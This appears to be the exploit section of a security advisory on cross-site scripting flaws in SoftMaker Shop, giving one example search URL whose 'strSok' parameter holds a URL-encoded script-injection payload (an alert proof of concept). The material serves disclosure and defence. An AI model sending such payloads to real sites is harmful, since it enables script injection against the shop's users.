• info
• discussion
• exploit
• solution
• references

SoftMaker Shop Multiple Cross-Site Scripting Vulnerabilities


No exploit is required.

An example URI has been provided:

http://www.example.com/shop/handle/varer/sok/resultat.asp?strSok=

%3CIMG+SRC%3Djavascript%3Aalert%28%26quot%3BXSS%26quot%3B%29%3E&valg=varer